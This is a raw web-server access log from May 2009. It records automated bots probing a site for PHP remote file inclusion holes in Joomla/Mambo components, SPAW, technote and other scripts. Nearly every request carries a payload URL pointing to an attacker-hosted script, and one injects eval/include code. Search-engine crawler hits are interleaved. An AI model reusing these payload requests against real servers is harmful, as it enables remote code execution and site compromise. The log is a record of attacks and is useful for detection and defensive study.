87.98.222.18 - - [14/May/2009:07:16:44 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:07:16:45 -0500] "GET /logs/access_log.1235174400//skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:17:01 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.231.24.38 - - [14/May/2009:07:18:01 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:07:18:02 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:07:18:03 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:07:18:03 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
201.234.41.5 - - [14/May/2009:07:18:06 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
201.234.41.5 - - [14/May/2009:07:18:07 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
222.231.24.38 - - [14/May/2009:07:18:08 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:07:18:08 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
222.239.76.25 - - [14/May/2009:07:18:45 -0500] "GET //skin/zero_vote/error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:18:45 -0500] "GET /logs/access_log.1235520000//skin/zero_vote/error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:18:45 -0500] "GET /logs//skin/zero_vote/error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:07:20:41 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:07:20:41 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:07:20:42 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:07:20:54 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:20:57 -0500] "GET /logs/access_log.1110672000 HTTP/1.1" 200 330 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.221.215.41 - - [14/May/2009:07:23:54 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:23:54 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:23:54 -0500] "GET /logs/access_log.1238630400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:51 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:51 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:51 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:58 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:58 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:24:58 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:25:06 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:26:05 -0500] "GET /logs/access_log.1137888000 HTTP/1.1" 200 663 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [14/May/2009:07:26:49 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:07:26:54 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:07:26:57 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:07:26:58 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
163.20.116.193 - - [14/May/2009:07:27:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mjswimgear.dk/joomla///media/idv6.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.800"
163.20.116.193 - - [14/May/2009:07:27:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mjswimgear.dk/joomla///media/idv6.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.800"
65.55.208.134 - - [14/May/2009:07:30:48 -0500] "GET /logs/access_log.1164326400 HTTP/1.1" 200 1056 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:07:30:49 -0500] "GET /logs/access_log.1115337600 HTTP/1.1" 200 666 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:07:30:49 -0500] "GET /logs/access_log.1184112000 HTTP/1.1" 200 4626 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:07:30:50 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 200 29623 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:07:30:50 -0500] "GET /logs/access_log.1200268800 HTTP/1.1" 200 1233 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [14/May/2009:07:30:50 -0500] "GET /logs/access_log.1195516800 HTTP/1.1" 200 1907 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:07:31:19 -0500] "GET /logs/access_log.1116547200 HTTP/1.1" 200 332 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.253.245.211 - - [14/May/2009:07:31:54 -0500] "GET /logs/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
145.253.245.211 - - [14/May/2009:07:31:54 -0500] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
210.240.12.4 - - [14/May/2009:07:33:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
210.240.12.4 - - [14/May/2009:07:33:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
163.20.116.193 - - [14/May/2009:07:33:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
163.20.116.193 - - [14/May/2009:07:33:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
163.20.116.193 - - [14/May/2009:07:33:53 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.55.106.189 - - [14/May/2009:07:34:36 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.189 - - [14/May/2009:07:35:29 -0500] "GET /logs/access_log.1200700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.239.76.25 - - [14/May/2009:07:35:43 -0500] "GET //skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:35:43 -0500] "GET /logs//skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:35:43 -0500] "GET /logs/access_log.1235520000//skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:35:57 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:35:57 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:35:57 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:36:49 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 200 657 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [14/May/2009:07:37:40 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:07:37:40 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.240.12.4 - - [14/May/2009:07:38:21 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.240.12.4 - - [14/May/2009:07:38:21 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
210.240.12.4 - - [14/May/2009:07:38:21 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.75.4.169 - - [14/May/2009:07:39:03 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [14/May/2009:07:39:04 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:07:41:52 -0500] "GET /logs/access_log.1179619200 HTTP/1.1" 200 459 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.52.130.1 - - [14/May/2009:07:41:59 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:41:59 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:41:59 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
202.75.4.169 - - [14/May/2009:07:43:18 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [14/May/2009:07:43:19 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.139 - - [14/May/2009:07:43:21 -0500] "GET /logs/access_log.1191628800 HTTP/1.1" 200 359 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
222.231.24.38 - - [14/May/2009:07:43:55 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:07:43:56 -0500] "GET //index2.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.52.130.1 - - [14/May/2009:07:44:06 -0500] "GET /logs/access_log.1235779200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:45:23 -0500] "GET //?path%5Bdocroot%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:45:23 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:45:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 189322 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:23 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:23 -0500] "GET /logs/access_log.1233187200//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:23 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:23 -0500] "GET /logs/access_log.1231372800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:25 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:25 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:25 -0500] "GET /logs/access_log.1233187200//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:46:25 -0500] "GET /logs/access_log.1231372800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:44 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:44 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:44 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:44 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:47 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:47 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:47 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:46:47 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:07:46:50 -0500] "GET /logs/access_log.1239753600//?path%5Bdocroot%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.1.180.250 - - [14/May/2009:07:47:01 -0500] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.75.68/catalog/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.808"
194.1.180.250 - - [14/May/2009:07:47:05 -0500] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.75.68/catalog/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
66.249.67.180 - - [14/May/2009:07:47:11 -0500] "GET /logs/access_log.1165190400 HTTP/1.1" 200 328 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.232.66.198 - - [14/May/2009:07:47:20 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:20 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:20 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:20 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:23 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:23 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:23 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:07:47:23 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:00 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:00 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:00 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:00 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:07:49:06 -0500] "GET /logs///sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:07:49:06 -0500] "GET /logs/access_log.1236124800///sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:07:49:06 -0500] "GET ///sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:08 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:08 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:08 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:07:49:08 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:49:21 -0500] "GET //skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:49:21 -0500] "GET /logs/access_log.1238025600//skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:49:21 -0500] "GET /logs//skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
